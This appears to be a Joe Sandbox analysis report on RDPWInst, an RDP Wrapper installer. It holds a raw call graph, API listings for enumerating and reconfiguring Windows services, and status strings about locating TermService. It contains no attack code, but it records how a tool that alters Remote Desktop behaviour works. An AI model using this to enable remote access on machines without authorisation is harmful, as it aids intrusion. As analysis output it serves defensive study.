23066->23067 23135 406c44 23066->23135 23131 43858c 23067->23131 23070 438b3e 23072 438b56 23070->23072 23139 4073dc 15 API calls 23070->23139 23073 438b84 RegOpenKeyExW 23072->23073 23074 438b93 23073->23074 23075 438b9c 23074->23075 23079 438bda 23074->23079 23076 438bc8 23075->23076 23140 407184 15 API calls 23075->23140 23141 4388bc 17 API calls 23076->23141 23080 438bfa RegOpenKeyExW 23079->23080 23081 438c09 23080->23081 23083 438c12 23081->23083 23087 438c4d 23081->23087 23082 438bd5 23082->22244 23084 438c3e 23083->23084 23142 407184 15 API calls 23083->23142 23143 4388bc 17 API calls 23084->23143 23088 438c6b RegOpenKeyExW 23087->23088 23089 438c7a 23088->23089 23089->23082 23090 438cac 23089->23090 23144 407184 15 API calls 23089->23144 23090->23082 23145 4388bc 17 API calls 23090->23145 23148 4392a0 23093->23148 23096 439422 23099 406d2c 14 API calls 23096->23099 23097 439478 23098 406bf0 15 API calls 23097->23098 23107 43946d 23098->23107 23100 439434 23099->23100 23151 4398f0 23100->23151 23102 43944c 23103 43946f 23102->23103 23105 439458 23102->23105 23159 438560 69 API calls 23103->23159 23106 406f48 15 API calls 23105->23106 23106->23107 23108 438860 23107->23108 23109 43886a 23108->23109 23110 43888e 23108->23110 23111 438870 RegFlushKey 23109->23111 23112 438876 RegCloseKey 23109->23112 23114 40e50c 23110->23114 23111->23112 23113 406bf0 15 API calls 23112->23113 23113->23110 23115 40e518 23114->23115 23116 40e53b 23115->23116 23117 40e52c 23115->23117 23119 406f48 15 API calls 23116->23119 23166 40e4bc 15 API calls 23117->23166 23120 40e539 23119->23120 23120->22259 23121->22240 23122->22240 23124 407dc4 23123->23124 23167 404cb8 23124->23167 23127->22245 23128->22258 23129->22267 23130->22292 23132 43859c 23131->23132 23134 4385cd 23132->23134 23146 4064f4 15 API calls 23132->23146 23134->23070 23137 406c48 23135->23137 23136 406c78 23136->23067 23137->23136 23147 4041cc 14 API calls 23137->23147 23139->23072 23141->23082 23143->23082 23145->23082 23146->23134 23147->23136 23160 43924c 23148->23160 23150 4392b4 23150->23096 23150->23097 23152 406c7c 23151->23152 23153 439916 RegQueryValueExW 23152->23153 23155 439929 23153->23155 23154 439951 23154->23102 23155->23154 23164 413794 69 API calls 23155->23164 23157 43994c 23165 405c30 14 API calls 23157->23165 23159->23107 23161 439264 23160->23161 23162 439278 RegQueryValueExW 23161->23162 23163 43928b 23162->23163 23163->23150 23164->23157 23166->23120 23168 404c3c 14 API calls 23167->23168 23169 404ccc 23168->23169 23170 404be8 14 API calls 23169->23170 23171 404cd9 23170->23171 23171->22256 23172->22333 23174 43c47b 23173->23174 23175 406bf0 15 API calls 23174->23175 23176 43c492 23175->23176 23177 43c4dc 23176->23177 23194 415584 16 API calls 23176->23194 23180 43c4f0 ExpandEnvironmentStringsW 23177->23180 23179 43c4ce 23181 406c44 14 API calls 23179->23181 23182 43c4fa 23180->23182 23181->23177 23182->22336 23184 406c7c 23183->23184 23185 43dc79 LoadLibraryExW 23184->23185 23186 43dc85 FindResourceW 23185->23186 23187 43dcfc 23185->23187 23186->23187 23188 43dc95 LoadResource 23186->23188 23190 40fed8 23187->23190 23188->23187 23189 43dca0 FreeLibrary 23188->23189 23189->23187 23195 40feec 23190->23195 23192 40fee7 23192->22341 23194->23179 23196 40fef5 23195->23196 23197 40ff49 23196->23197 23213 4064f4 15 API calls 23196->23213 23199 40ffa0 23197->23199 23200 40ff59 23197->23200 23203 40ff76 23199->23203 23215 4064f4 15 API calls 23199->23215 23200->23203 23214 4064f4 15 API calls 23200->23214 23204 41004b 23203->23204 23211 40ffd3 23203->23211 23205 406d2c 14 API calls 23204->23205 23209 410049 23205->23209 23206 41003e 23207 406f48 15 API calls 23206->23207 23207->23209 23208 406bf0 15 API calls 23208->23211 23209->23192 23210 406f48 15 API calls 23210->23211 23211->23206 23211->23208 23211->23210 23216 4064f4 15 API calls 23211->23216 23213->23197 23214->23203 23215->23203 23216->23211 23276 40819c 23217->23276 23221 43b1bc 23220->23221 23222 407450 15 API calls 23221->23222 23223 43b1d9 23222->23223 23224 407450 15 API calls 23223->23224 23225 43b1e1 23224->23225 23226 407450 15 API calls 23225->23226 23227 43b1eb 23226->23227 23228 404cdc 14 API calls 23227->23228 23229 43b1f0 23228->23229 23230 4042f8 14 API calls 23229->23230 23231 43b1f5 OpenSCManagerW 23230->23231 23232 43b243 23231->23232 23233 43b209 GetLastError 23231->23233 23235 43b24d OpenServiceW 23232->23235 23234 407450 15 API calls 23233->23234 23236 43b225 23234->23236 23237 43b297 ChangeServiceConfigW 23235->23237 23238 43b25a CloseServiceHandle GetLastError 23235->23238 23239 407dec 14 API calls 23236->23239 23240 43b2f7 CloseServiceHandle CloseServiceHandle 23237->23240 23241 43b2b4 CloseServiceHandle CloseServiceHandle GetLastError 23237->23241 23242 407450 15 API calls 23238->23242 23243 43b22a 23239->23243 23245 43b23e 23240->23245 23246 407450 15 API calls 23241->23246 23247 43b27c 23242->23247 23244 407450 15 API calls 23243->23244 23248 43b234 23244->23248 23245->22438 23249 43b2dc 23246->23249 23250 407dec 14 API calls 23247->23250 23251 404cdc 14 API calls 23248->23251 23252 407dec 14 API calls 23249->23252 23253 43b281 23250->23253 23254 43b239 23251->23254 23255 43b2e1 23252->23255 23256 407450 15 API calls 23253->23256 23257 4042f8 14 API calls 23254->23257 23258 407450 15 API calls 23255->23258 23259 43b28b 23256->23259 23257->23245 23261 43b2eb 23258->23261 23260 404cdc 14 API calls 23259->23260 23262 43b290 23260->23262 23263 404cdc 14 API calls 23261->23263 23264 4042f8 14 API calls 23262->23264 23265 43b2f0 23263->23265 23266 43b295 23264->23266 23267 4042f8 14 API calls 23265->23267 23266->23245 23267->23266 23269 408346 23268->23269 23273 408378 23268->23273 23270 408370 23269->23270 23269->23273 23301 40789c 23269->23301 23326 4041cc 14 API calls 23270->23326 23273->22100 23274->22442 23277 4081bb 23276->23277 23281 4081d5 23276->23281 23278 4081c6 23277->23278 23295 4042a0 14 API calls 23277->23295 23296 408194 16 API calls 23278->23296 23283 40821e 23281->23283 23297 4042a0 14 API calls 23281->23297 23282 4081d0 23282->22438 23285 40822f 23283->23285 23298 4042a0 14 API calls 23283->23298 23287 408238 23285->23287 23288 40826d 23285->23288 23299 4041e4 14 API calls 23287->23299 23289 4041b0 14 API calls 23288->23289 23291 408277 23289->23291 23292 408268 23291->23292 23300 40817c 20 API calls 23291->23300 23292->23282 23294 40819c 20 API calls 23292->23294 23294->23292 23295->23278 23296->23282 23297->23283 23298->23285 23299->23292 23300->23292 23302 4078a5 23301->23302 23305 4078e2 23301->23305 23303 4078e7 23302->23303 23304 4078ba 23302->23304 23306 4078f8 23303->23306 23307 4078ee 23303->23307 23304->23305 23308 4078c2 23304->23308 23309 407904 23304->23309 23305->23270 23327 406368 14 API calls 23306->23327 23310 406344 14 API calls 23307->23310 23314 4078c6 23308->23314 23315 407938 23308->23315 23312 407915 23309->23312 23313 40790b 23309->23313 23310->23305 23328 4068dc SysFreeString 23312->23328 23316 4068c4 SysFreeString 23313->23316 23318 407947 23314->23318 23319 4078ca 23314->23319 23315->23305 23329 407884 14 API calls 23315->23329 23316->23305 23318->23305 23322 40789c 16 API calls 23318->23322 23321 407965 23319->23321 23325 4078d2 23319->23325 23321->23305 23330 40784c 16 API calls 23321->23330 23322->23318 23324 408340 16 API calls 23324->23325 23325->23305 23325->23324 23326->23273 23327->23305 23328->23305 23329->23315 23330->23321 23415 40f8fc 23331->23415 23333 40f9eb 23421 40730c 23333->23421 23335 40f9fc 23336 40f7c4 23335->23336 23337 406c7c 23336->23337 23338 40f7ce GetFileAttributesW 23337->23338 23339 40f7d9 23338->23339 23339->22510 23339->22623 23341 40f7fd 23340->23341 23342 40f835 23341->23342 23443 4136c4 69 API calls 23341->23443 23433 414f3c 23342->23433 23346 40f825 23444 405c30 14 API calls 23346->23444 23347 406c44 14 API calls 23349 40f84b 23347->23349 23350 40f868 23349->23350 23445 4064f4 15 API calls 23349->23445 23352 40f876 23350->23352 23353 40f7c4 GetFileAttributesW 23350->23353 23354 40f886 23352->23354 23355 40f9d8 15 API calls 23352->23355 23353->23352 23358 40f9d8 15 API calls 23354->23358 23360 40f8c6 23354->23360 23356 40f895 23355->23356 23357 4072a4 15 API calls 23356->23357 23357->23354 23359 40f8b2 23358->23359 23361 40f7e8 71 API calls 23359->23361 23360->22531 23362 40f8ba 23361->23362 23362->23360 23440 40fb5c 23362->23440 23365 406bf0 23364->23365 23366 40716f 23364->23366 23365->23364 23367 4070b0 23365->23367 23369 406c00 23365->23369 23371 406c10 23365->23371 23367->23366 23370 406bf0 15 API calls 23367->23370 23374 4070c3 23367->23374 23368 406c40 23368->22540 23369->23371 23373 407504 14 API calls 23369->23373 23370->23374 23371->23368 23457 4041cc 14 API calls 23371->23457 23372 40710c 23372->23366 23378 407504 14 API calls 23372->23378 23373->23371 23377 4070ee 23374->23377 23458 406504 15 API calls 23374->23458 23377->23372 23459 406504 15 API calls 23377->23459 23380 407122 23378->23380 23382 40715a 23380->23382 23460 406368 14 API calls 23380->23460 23383 406bf0 15 API calls 23382->23383 23384 40716b 23383->23384 23384->22540 23386 406c7c 23385->23386 23387 40f787 GetFileAttributesW 23386->23387 23388 40f792 23387->23388 23389 40f79a GetLastError 23387->23389 23388->22552 23390 40f7a6 23389->23390 23391 40f7bb 23389->23391 23390->23391 23392 40f7b0 23390->23392 23391->22552 23461 40f73c FindFirstFileW FindClose 23392->23461 23394 40f7b7 23394->23391 23396 43cc63 23395->23396 23462 42f9fc 23396->23462 23398 43cc91 23466 42f7b0 23398->23466 23400 43ccad 23401 407450 15 API calls 23400->23401 23402 43cd49 23401->23402 23403 407450 15 API calls 23402->23403 23404 43cd51 23403->23404 23405 407450 15 API calls 23404->23405 23406 43cd5b 23405->23406 23407 407450 15 API calls 23406->23407 23408 43cd63 23407->23408 23409 404cdc 14 API calls 23408->23409 23410 43cd68 23409->23410 23411 4042f8 14 API calls 23410->23411 23412 43cd6d 23411->23412 23412->22513 23413->22623 23414->22556 23416 40f912 23415->23416 23419 40f93d 23416->23419 23430 4064f4 15 API calls 23416->23430 23418 40f9b2 23418->23333 23419->23418 23420 4064f4 15 API calls 23419->23420 23420->23419 23422 407322 23421->23422 23424 40734d 23422->23424 23431 4064f4 15 API calls 23422->23431 23425 407395 23424->23425 23426 4073a8 23424->23426 23427 406d2c 14 API calls 23425->23427 23432 406d1c 15 API calls 23426->23432 23429 4073a6 23427->23429 23429->23335 23430->23419 23431->23424 23432->23429 23434 406bf0 15 API calls 23433->23434 23435 414f4c 23434->23435 23446 414e7c 23435->23446 23437 414f66 23438 40f840 23437->23438 23439 406f48 15 API calls 23437->23439 23438->23347 23439->23438 23441 406c7c 23440->23441 23442 40fb68 CreateDirectoryW 23441->23442 23442->23360 23443->23346 23445->23350 23447 414e8e 23446->23447 23450 414ebd 23447->23450 23454 4064f4 15 API calls 23447->23454 23448 414ef0 23453 414f0b 23448->23453 23456 414728 15 API calls 23448->23456 23450->23448 23455 4064f4 15 API calls 23450->23455 23453->23437 23454->23450 23455->23448 23456->23453 23457->23368 23458->23377 23459->23372 23460->23382 23461->23394 23463 42fa06 23462->23463 23471 42fb48 FindResourceW 23463->23471 23465 42fa36 23465->23398 23483 42f548 23466->23483 23468 42f7ca 23487 42f798 69 API calls 23468->23487 23470 42f7e5 23470->23400 23472 42fb74 LoadResource 23471->23472 23473 42fb6d 23471->23473 23474 42fb87 23472->23474 23475 42fb8e SizeofResource LockResource 23472->23475 23481 42faa8 69 API calls 23473->23481 23482 42faa8 69 API calls 23474->23482 23478 42fbac 23475->23478 23478->23465 23479 42fb73 23479->23472 23480 42fb8d 23480->23475 23481->23479 23482->23480 23484 42f551 23483->23484 23488 42f58c 23484->23488 23486 42f56d 23486->23468 23487->23470 23489 42f5a7 23488->23489 23490 42f5d3 23489->23490 23491 42f64f 23489->23491 23513 40f650 23490->23513 23521 40f5f8 CreateFileW 23491->23521 23494 42f659 23512 42f64d 23494->23512 23522 40fa54 17 API calls 23494->23522 23496 42f5f0 23496->23512 23517 40fa54 17 API calls 23496->23517 23497 406bf0 15 API calls 23500 42f6bc 23497->23500 23498 42f674 GetLastError 23523 412bfc 15 API calls 23498->23523 23500->23486 23502 42f60f GetLastError 23518 412bfc 15 API calls 23502->23518 23503 42f68b 23524 413794 69 API calls 23503->23524 23506 42f626 23519 413794 69 API calls 23506->23519 23507 42f6ad 23525 405c30 14 API calls 23507->23525 23510 42f648 23520 405c30 14 API calls 23510->23520 23512->23497 23514 40f667 23513->23514 23515 40f68f 23513->23515 23516 40f689 CreateFileW 23514->23516 23515->23496 23516->23515 23517->23502 23518->23506 23519->23510 23521->23494 23522->23498 23523->23503 23524->23507 23527 406c44 14 API calls 23526->23527 23528 438a04 23527->23528 23529 43858c 15 API calls 23528->23529 23530 438a0c 23529->23530 23531 438a24 23530->23531 23552 4073dc 15 API calls 23530->23552 23533 438a35 23531->23533 23535 438a65 23531->23535 23534 438a51 RegOpenKeyExW 23533->23534 23538 438a60 23534->23538 23536 438a8b RegCreateKeyExW 23535->23536 23536->23538 23537 438ad3 23537->22661 23538->23537 23539 438ac6 23538->23539 23553 407184 15 API calls 23538->23553 23554 4388bc 17 API calls 23539->23554 23543 439392 23542->23543 23544 4393bd 23543->23544 23563 4064f4 15 API calls 23543->23563 23555 43987c 23544->23555 23547 4393e3 23547->22670 23548->22657 23549->22657 23550->22663 23552->23531 23554->23537 23556 439895 23555->23556 23557 4398a9 RegSetValueExW 23556->23557 23558 4398bc 23557->23558 23559 4398e4 23558->23559 23564 413794 69 API calls 23558->23564 23559->23547 23561 4398df 23565 405c30 14 API calls 23561->23565 23563->23544 23564->23561 23567 43ae3c 23566->23567 23568 407450 15 API calls 23567->23568 23569 43ae60 23568->23569 23570 407450 15 API calls 23569->23570 23571 43ae68 23570->23571 23572 407450 15 API calls 23571->23572 23573 43ae72 23572->23573 23574 404cdc 14 API calls 23573->23574 23575 43ae77 23574->23575 23576 4042f8 14 API calls 23575->23576 23577 43ae7c OpenSCManagerW 23576->23577 23578 43ae90 GetLastError 23577->23578 23579 43aeca 23577->23579 23580 407450 15 API calls 23578->23580 23582 43aed4 OpenServiceW 23579->23582 23581 43aeac 23580->23581 23585 407dec 14 API calls 23581->23585 23583 43af21 QueryServiceConfigW 23582->23583 23584 43aee1 CloseServiceHandle GetLastError 23582->23584 23588 43af33 23583->23588 23589 43af51 23583->23589 23586 407450 15 API calls 23584->23586 23587 43aeb1 23585->23587 23590 43af03 23586->23590 23592 407450 15 API calls 23587->23592 23593 407450 15 API calls 23588->23593 23591 4041b0 14 API calls 23589->23591 23594 407dec 14 API calls 23590->23594 23595 43af5b QueryServiceConfigW 23591->23595 23596 43aebb 23592->23596 23597 43af42 23593->23597 23598 43af08 23594->23598 23599 43af71 23595->23599 23600 43afbe 23595->23600 23601 404cdc 14 API calls 23596->23601 23602 404cdc 14 API calls 23597->23602 23605 407450 15 API calls 23598->23605 23627 4041cc 14 API calls 23599->23627 23628 4041cc 14 API calls 23600->23628 23607 43aec0 23601->23607 23603 43af47 23602->23603 23608 4042f8 14 API calls 23603->23608 23610 43af12 23605->23610 23612 4042f8 14 API calls 23607->23612 23613 43af1c 23608->23613 23609 43afd1 CloseServiceHandle CloseServiceHandle 23614 43aec5 23609->23614 23615 404cdc 14 API calls 23610->23615 23611 43af7b CloseServiceHandle CloseServiceHandle GetLastError 23616 407450 15 API calls 23611->23616 23612->23614 23613->23614 23614->22687 23617 43af17 23615->23617 23618 43afa3 23616->23618 23619 4042f8 14 API calls 23617->23619 23620 407dec 14 API calls 23618->23620 23619->23613 23621 43afa8 23620->23621 23622 407450 15 API calls 23621->23622 23623 43afb2 23622->23623 23624 404cdc 14 API calls 23623->23624 23625 43afb7 23624->23625 23626 4042f8 14 API calls 23625->23626 23626->23613 23627->23611 23628->23609 23629->22700 23631->22708 23633->22713 23635->22732 23636->22735 23637->22779 23638->22780 23639->22780 23640->22780 23642 439674 70 API calls 23641->23642 23643 4396c0 23642->23643 23643->22803 23663 4399a0 23644->23663 23646 439d58 23647 439d64 23646->23647 23648 439d5e RegCloseKey 23646->23648 23647->22808 23647->22851 23648->23647 23649->22791 23650->22791 23651->22796 23652->22813 23653->22833 23664 406c44 14 API calls 23663->23664 23665 4399c9 23664->23665 23666 43858c 15 API calls 23665->23666 23667 4399d1 23666->23667 23669 4399e9 23667->23669 23672 4073dc 15 API calls 23667->23672 23670 439a0a RegOpenKeyExW 23669->23670 23671 439a25 23670->23671 23671->23646 23672->23669 23674 43c32e 23673->23674 23690 4074fc 23674->23690 23676 43c35c 23677 43c378 CreateProcessW 23676->23677 23678 43c3b7 CloseHandle WaitForSingleObject CloseHandle 23677->23678 23679 43c384 GetLastError 23677->23679 23682 43c3b5 23678->23682 23680 407450 15 API calls 23679->23680 23681 43c39c 23680->23681 23683 407dec 14 API calls 23681->23683 23682->22936 23684 43c3a1 23683->23684 23685 407450 15 API calls 23684->23685 23686 43c3ab 23685->23686 23687 404cdc 14 API calls 23686->23687 23688 43c3b0 23687->23688 23689 4042f8 14 API calls 23688->23689 23689->23682 23691 4074a8 23690->23691 23692 4074f5 23691->23692 23693 4074bb 23691->23693 23698 4064ec 15 API calls 23691->23698 23692->23676 23693->23692 23695 407504 14 API calls 23693->23695 23696 4074cf 23695->23696 23696->23692 23699 4041cc 14 API calls 23696->23699 23698->23693 23699->23692 23700 42da28 23701 42da56 23700->23701 23702 408334 20 API calls 23701->23702 23703 42da89 23702->23703 23710 416308 23703->23710 23705 42daa3 23731 416e30 23705->23731 23708 42dacc 23709 402990 VirtualAlloc 23709->23708 23711 416332 23710->23711 23721 416352 23710->23721 23738 416ea0 InterlockedCompareExchange 23711->23738 23713 40789c 16 API calls 23715 4163fd 23713->23715 23714 416337 23716 416356 23714->23716 23717 41634d 23714->23717 23715->23705 23740 416270 InterlockedCompareExchange 23716->23740 23739 416ea0 InterlockedCompareExchange 23717->23739 23720 41635b 23722 416371 23720->23722 23723 41637a 23720->23723 23721->23713 23741 416270 InterlockedCompareExchange 23722->23741 23742 416edc 71 API calls 23723->23742 23726 41637f 23727 416395 23726->23727 23728 41639e 23726->23728 23743 416edc 71 API calls 23727->23743 23744 416dbc 71 API calls 23728->23744 23745 416b68 23731->23745 23733 416e5f 23734 406d2c 14 API calls 23733->23734 23735 416e74 23734->23735 23736 408340 16 API calls 23735->23736 23737 416e8f 23736->23737 23737->23709 23738->23714 23739->23721 23740->23720 23741->23721 23742->23726 23743->23721 23744->23721 23746 416b9a 23745->23746 23747 416b7f 23745->23747 23748 416bc2 23746->23748 23787 413794 69 API calls 23746->23787 23747->23746 23785 4136c4 69 API calls 23747->23785 23754 416bea 23748->23754 23789 413794 69 API calls 23748->23789 23751 416b95 23786 405c30 14 API calls 23751->23786 23752 416bbd 23788 405c30 14 API calls 23752->23788 23758 416c1b 23754->23758 23791 413794 69 API calls 23754->23791 23757 416be5 23790 405c30 14 API calls 23757->23790 23767 416a78 23758->23767 23762 416c16 23792 405c30 14 API calls 23762->23792 23765 408334 20 API calls 23766 416c42 23765->23766 23766->23733 23768 416aaa 23767->23768 23769 416a8f 23767->23769 23770 416ad2 23768->23770 23795 413794 69 API calls 23768->23795 23769->23768 23793 4136c4 69 API calls 23769->23793 23776 416afa 23770->23776 23797 413794 69 API calls 23770->23797 23773 416aa5 23794 405c30 14 API calls 23773->23794 23774 416acd 23796 405c30 14 API calls 23774->23796 23781 416b2b 23776->23781 23799 413794 69 API calls 23776->23799 23779 416af5 23798 405c30 14 API calls 23779->23798 23781->23765 23783 416b26 23800 405c30 14 API calls 23783->23800 23785->23751 23787->23752 23789->23757 23791->23762 23793->23773 23795->23774 23797->23779 23799->23783 23801 40472c 23802 404742 23801->23802 23803 404748 23802->23803 23804 4047a5 CreateFileW 23802->23804 23805 404857 GetStdHandle 23802->23805 23806 4047c3 23804->23806 23807 4048cb GetLastError 23804->23807 23805->23807 23810 404892 23805->23810 23809 4047d1 GetFileSize 23806->23809 23806->23810 23807->23803 23809->23807 23811 4047e5 SetFilePointer 23809->23811 23810->23803 23812 40489c GetFileType 23810->23812 23811->23807 23815 404801 ReadFile 23811->23815 23812->23803 23814 4048b7 CloseHandle 23812->23814 23814->23803 23815->23807 23816 404823 23815->23816 23816->23810 23817 404836 SetFilePointer 23816->23817 23817->23807 23818 40484b SetEndOfFile 23817->23818 23818->23807 23819 404855 23818->23819 23819->23810

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 637 43b7d4-43b7d7 638 43b7dc-43b7e1 637->638 638->638 639 43b7e3-43b7f4 638->639 640 43b7f8-43b80a OpenSCManagerW 639->640 641 43b848-43b8a9 call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 640->641 642 43b80c-43b843 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 640->642 660 43b8af-43b8bc GetLastError 641->660 661 43b99e-43b9b5 CloseServiceHandle call 40816c 641->661 642->641 664 43b8fe-43b95a call 408334 call 40816c call 404a04 call 40816c EnumServicesStatusExW 660->664 665 43b8be-43b8f9 CloseServiceHandle call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 660->665 671 43ba22-43ba26 661->671 672 43b9b7-43b9b8 661->672 664->661 714 43b95c-43b999 CloseServiceHandle GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 664->714 665->661 675 43ba4b-43ba52 671->675 676 43ba28-43ba46 call 407450 call 404cdc call 4042f8 call 40632c 671->676 677 43b9ba-43b9c5 672->677 682 43ba54-43ba58 675->682 683 43ba9f-43baf7 call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 408334 call 40816c 675->683 676->675 677->671 681 43b9c7-43b9f6 call 406d9c call 40e50c * 2 call 4072a4 677->681 738 43b9f8-43ba1c call 406d9c 681->738 739 43ba1e-43ba20 681->739 690 43ba5a-43ba78 call 407450 call 404cdc call 4042f8 call 40632c 682->690 691 43ba7d-43ba91 call 43b1a8 call 43b58c 682->691 752 43bb80-43bb9b call 406bf0 call 40816c 683->752 753 43bafd-43bafe 683->753 690->691 717 43ba96-43ba9a 691->717 714->661 717->640 738->671 739->671 739->677 766 43bbe4-43bbeb 752->766 767 43bb9d-43bb9e 752->767 755 43bb00-43bb0a 753->755 755->752 758 43bb0c-43bb19 755->758 760 43bb1b-43bb37 call 406d9c call 4072a4 758->760 761 43bb7c-43bb7e 758->761 760->761 777 43bb39-43bb77 call 40816c call 408334 call 40816c call 406d9c 760->777 761->752 761->755 769 43bc13-43bc27 call 407450 call 404cdc call 4042f8 766->769 770 43bbed-43bc11 call 407450 * 2 call 404cdc call 4042f8 766->770 768 43bba0-43bba7 767->768 773 43bba9-43bbbc call 406bf0 768->773 774 43bbbe-43bbdb call 407184 768->774 794 43bc2c-43bc5c call 406be8 call 406be0 call 408340 769->794 770->794 785 43bbe0-43bbe2 773->785 774->785 777->761 785->766 785->768
                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000005,00000000,0043BC5D,?,?,?,00447324,00000000,00000000,?,00443F06,00000000,00443FB2), ref: 0043B801
                                                                                                                                  • GetLastError.KERNEL32(00000000,ServicesActive,00000005,00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B80C
                                                                                                                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B8A2
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8AF
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,?,?,00000000,00000000), ref: 0043B8BF
                                                                                                                                  • EnumServicesStatusExW.ADVAPI32(00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B953
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B95D
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000030,00000003,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043B962
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000030,00000003,?,00000000,?,?,?,00000000), ref: 0043B99F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseErrorHandleLastService$EnumServicesStatus$ManagerOpen
                                                                                                                                  • String ID: $sD$ServicesActive$TermService$[*] No shared services found.$[*] Shared services found: $[+] TermService found (pid $[-] EnumServicesStatusEx error (code $[-] Failed to set up TermService. Unknown error.$[-] OpenSCManager error (code $[-] TermService not found.
                                                                                                                                  • API String ID: 2770857348-2470772499
                                                                                                                                  • Opcode ID: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                                                  • Instruction ID: fb74497bf6b161f68451673f63bd6f491a4d1cb4b87c09a1aee9fb4a9c308b37
                                                                                                                                  • Opcode Fuzzy Hash: bdcf77957b8ef17359aa2c2f35968ba8930b31ce6167e8ba152cfdf214f6386e
                                                                                                                                  • Instruction Fuzzy Hash: A1C15074A041049BD710FBB9DD42B5E76A5EB89308F11507FF640BB292CB3CAD058BAE

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B1FE
                                                                                                                                  • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000,00000000,00000000,00000030), ref: 0043B209
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C,00000000), ref: 0043B24F
                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B25B
                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00000000,00000002,00000000,ServicesActive,00000001,00000000,0043B319,?,?,-00000001,00000000,?,?,0043BA8C), ref: 0043B260
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2133281442.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2133228580.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133334437.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133385196.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133406060.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133466108.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2133507503.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_400000_RDPWInst.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLastOpenService$CloseHandleManager
                                                                                                                                  • String ID: $sD$...$ServicesActive$[*] Configuring $[-] ChangeServiceConfig error (code $[-] OpenSCManager error (code $[-] OpenService error (code
                                                                                                                                  • API String ID: 48634454-398082305
                                                                                                                                  • Opcode ID: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
                                                                                                                                  • Instruction ID: ec3001641675e227f0f71ffcc16d431bf32a474d6a16b1f18b89db5f0a2815a5
                                                                                                                                  • Opcode Fuzzy Hash: 3b1e76f9c62e1046217b3bbe464b976e02e2f47daf27cfab7c11257a6428595c
